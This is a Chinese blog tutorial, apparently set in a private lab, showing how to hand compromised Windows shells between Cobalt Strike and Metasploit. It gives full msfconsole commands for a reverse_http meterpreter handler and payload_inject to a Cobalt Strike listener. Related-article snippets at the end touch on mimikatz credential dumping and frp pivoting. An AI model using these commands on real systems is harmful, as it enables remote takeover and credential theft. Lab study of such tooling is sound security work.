Cs与msf互传shell

已于 2024-06-02 01:24:20 修改
阅读量397 收藏 4
点赞数 16
文章标签: linux 运维 服务器
于 2024-06-02 00:40:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75387456/article/details/139381581
版权

Cs的shell反弹到msf

首先咋们需要准备两台kali,一台win10靶机

kali1 ip:192.168.5.129

kali2 ip:192.168.5.161

win10 ip:192.168.5.165

咋们利用kali1打开cs,利用kali2打开msf进行联动;

在cs上建立一个监听,名字随便起,这里我起名为test,ip输入kali1的;

生成一段payload,并在win10靶机上线(在win10点击生成的payload即可)

然后在kali2启动msf,使用监听模块

命令:

msfconsole        //进入msf控制台

use exploit/multi/handler    //进入监听模块

set payload windows/meterpreter/reverse_http   //设置http协议

set lhost 192.168.5.161        //kali2的ip

set lport 2222

run

在添加一个监听器和msf一样就行了

这时候需要把码主动的发给msf,所以选择foreign http

对了,要右键把回连间隔设置成0,不然太慢了

接下来我们把我们的这个shell发送给msf,

命令:执行choose

          或者直接spawn msf

成功获取权限

msf传shell给cs

首先,msf获得win10的权限,具体操作:msfconsole之制作windows木马并成功获取shell(反向payload)-CSDN博客

先在 cs 开启监听,Cobalt Strike->Listeners-Add,Name 随便填,Host 填写服务端 ip,Port 填写服务端设置的端口

首先msf中已有会话session 1

use exploit/windows/local/payload_inject

set payload windows/meterpreter/reverse_http   #两边的payload协议一定要对应的

set DisablePayloadHandler true   #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于已经有了一个不需要再产生一个,所以这里设置为true

set lhost 192.168.5.129                #cobaltstrike服务端ip

set lport 4444                #cobaltstrike服务端监听的端口

set session 1                    #这里是当前获得的session的id

run

可以看到 cs 成功接收到 shell

雷宝SF
关注
csmsf联动概述
weixin_43873557的博客
02-08 2450
cobalt strike(简称CS)及Metasploit(简称msf)各有所长,cs更适合作为稳控平台,msf更适用于与各类内网信息搜集及漏洞利用。为了取各家之所长,我们进行联动。 获得beacon shell,启动socks shell ipconfig 目标机器在24.*网段,仅一个网段 思路:利用 beacon shell 在目标机器和团队服 务器之间建立 socks,而后再在本地利用proxychains 之类的工具连到目标内网即可。 查看团队服务器 socks 端口启起来了没有:netst
内网安全学习(八)---CS&MSF联动
qi_SJQ_的博客
02-17 3714
域横向 CS&MSF 联动 Shell CS->MSF: 创建Foreign监听器 MSF监听模块设置对应端口地址 CS执行Spawn选择监听器 MSF->CSCS创建监听器 MSF载入新模块注入设置对应地址端口 执行CS等待上线 use exploit/windows/local/payload_inject 首先需要两台服务器一个上线cs一个上线msf 启动上线cs生成木马上线两台主机,之后启动msf。 1)接下来,将CS移交到MSF上: 先添加会话,填写msf主机信息: 配
msfcs互传shell
内心不种满鲜花就会长满杂草
04-19 2829
因为cobaltstrike和MSF各有优势,所有有时候需要互传shell。假设cs此时获取了一个shell,然后需要将此shell传给msf 1. 在msf中创建反向监听 use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost 192.168.
csmsf权限传递,以及mimikatz抓取win2012明文
最新发布
2201_75885649的博客
06-14 984
windows输入密码的进程是winlogon.exe,然后输入密码后给到lsass.exe这个进程,这个进程会存储一份明文再内存中,ntlmv2加密后发一份给sma文件,mimikatz就抓内存中的明文。set payload windows/meterpreter/reverse_http(注:这里是http,与cs上线的。密码是null,是官方修改的。正常情况管理员会登录,就可以再用mimicatz抓密码,此时就是明文密码。set lport 自己的端口号。set lhost 本机ip。
CSMSF联动/shell互相反弹
qq_59468567的博客
04-12 408
set DisablePayloadHandler true #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于已经有了一个不需要再产生一个,所以这里设置为true。set payload windows/meterpreter/reverse_http #两边的payload协议一定要对应的。先建立一个监听器,和msf的要一一对应,上面的ip必须是可以ping通的大部分情况是外网ip。此处标红的对应下面的两个,取决加不加。然后返回前面的增加会话。
msfcs联动
bring_coco的博客
05-18 2068
环境:kali(192.168.190.128)NATAPP。
msfcs互相传动
weixin_44110913的博客
10-10 1689
CS->MSF MSF: use exploit/multi/handler set payload windows/meterpreter/reverse_http CS: 创建监听器windows/foreign/reverse_http 执行监听器 spawn msf MSF->CS MSF: background use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http C
利用frp将csshell派生msf
weixin_43939009的博客
06-27 771
msf作为内网渗透中强大的工具,集成了许多漏洞利用的EXP,以及各种扫描功能便于使用,今天介绍使用Frp将csshell派生msf,满足内网渗透中的需求。 第一步: 首先我们连上cs后,我们需要去监听器修改参数。 我们这里Add添加一个,随便写个名字,这里我写了msf,模式选择foreign HTTP模式,HTTP Host出填写自己的VPS地址,端口随意,我这里是1080端口。填写完毕Save即可。 第二步: 在自己的vps上启动frp服务端,frp不多做介绍,目前主流的内网穿透工具,这里基础使用
MSF恶意程序利用+CS上线
dream2662583的博客
10-19 388
我是dream,我在新课程培训学习网安方面的知识,下面是关于msf恶意程序利用以及CS的内容。
webshell流量隐蔽&CSMSF联动
Ms08067安全实验室
03-29 2071
文章来源|MS08067 内网安全知识星球本文作者:BlackCat(Ms08067内网安全小组成员)内网纵横四海 认准Ms08067环境:Windows:192.168.93.3 ...
MSFCS之间会话传递,互相派生,版本问题踩坑
qq_29060627的博客
10-12 636
cobaltstrike使用版本4.5,可以msf派生cs4.5,但是cs4.5不能派生msf,得换cobaltstrike4.1的版本。
Cobalt_Strike与Metasploit(msf)联动-Win或Linux不同系统之间互相弹shell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
09-06 2524
Cobalt Strike和Msf(Metasploit)之间的相互派生shell。完整的记录了Windows系统被控主机的csmsf互相反弹shellLinux系统被控主机的反弹shellcscs上的Linux主机反弹shellmsf
内网安全-域横向CS&MSF联动及应急响应初识
xhscxj的博客
03-25 4083
案例1:MSF&CobaltStrike联动Shell CS->MSF 创建Foreign监听器->MSF监听模块设置对应地址端口->CS执行Spawn选择监听器 MSF->CS CS创建监听器->MSF载入新模块注入设置对应地址端口->执行CS等待上线 use exploit/windows/local/payload_inject 首先准备一台外网的服务器,安装上csmsfcs会话反弹到msf上 本地连接cs,目标cs上线后,创建监听 msf处..
msf联动cs
hmysn的博客
12-31 2160
Cobalt Strike简称CS 用于团队作战使用,由一个服务端和多个客户端组成,能让多个攻击者这在一个团队服务器上共享目标资源和信息,我们在使用msf获得权限以后,可以将信息共享到cs上,使用cs来进行监听以及其他的操作。
msfcs互传msfcs建立frp穿透
qq_42430287的博客
04-13 1926
msfcs互传msfcs建立frp穿透
cobalt strike(cs)和metasploit(msf)联动
weixin_39251927的博客
05-11 5468
一、当cs获取到会话后反弹给msf 1、msf上操作 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.52.208 set lport 7777 exploit -j #-j 后台监听 2、CS上操作 首先有一个已经建立会话的shell,然后添加监听器Listener,HOST和PORT填写msf监听的地址IP:x.x.x.x,PORT:7777 配置内网穿透 如果msf主机处于
使用csmsf进行内网横向移动
qq_46635165的博客
10-10 4834
使用csmsf进行内网横向移动 目标系统为 :192.168.1.123 , 跳板主机为:192.168.1.118 一,使用cs探测内网 1, 将目标上线至CS 2, 使用cs探测内网信息 查看当前目标系统网络情况,确认目标系统所在内网网段 3, 使用cs的portscan功能对内网进行扫描 portscan 192.168.1.115-192.168.1.125 22,80,445,3389 arp 1024 可以看到目标开放了3389,445,80端口; 二,内网横向移动 对当前目标系统所获取
csmsf联动
inslight的博客
09-22 1028
csmsf联动
MSFCS联动
一纸荒芜的博客
08-27 2789
msfcs
msf生成反弹shell
08-28
你可以使用Metasploit Framework (MSF)来生成一个反弹shell。这里有一个示例,展示如何使用MSF生成一个反弹到攻击者机器的shell: 1. 首先,启动Metasploit Framework控制台。在终端中输入 `msfconsole` 并按下回车。 2. 输入以下命令来查找可用的Payload: ``` search payload/windows/shell_reverse_tcp ``` 3. 选择一个适合的Payload并记下其Payload编号。 4. 设置Payload选项。使用 `use` 命令加上Payload编号,例如: ``` use windows/shell_reverse_tcp ``` 5. 设置Payload的必要参数。使用 `set` 命令加上参数名和值来设置,例如: ``` set LHOST <攻击者机器的IP地址> set LPORT <监听端口号> ``` 6. 启动监听器。使用 `exploit` 命令来启动监听器并等待目标主机连接。 ``` exploit ``` 7. 当目标主机与你的监听器连接时,你将收到一个反弹到攻击者机器的shell。 请注意,上述步骤只是简单介绍了如何使用MSF生成反弹shell,实际操作需要更多的细节和配置。确保你在合法的环境中进行这些操作,并遵循所有法律和道德准则。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值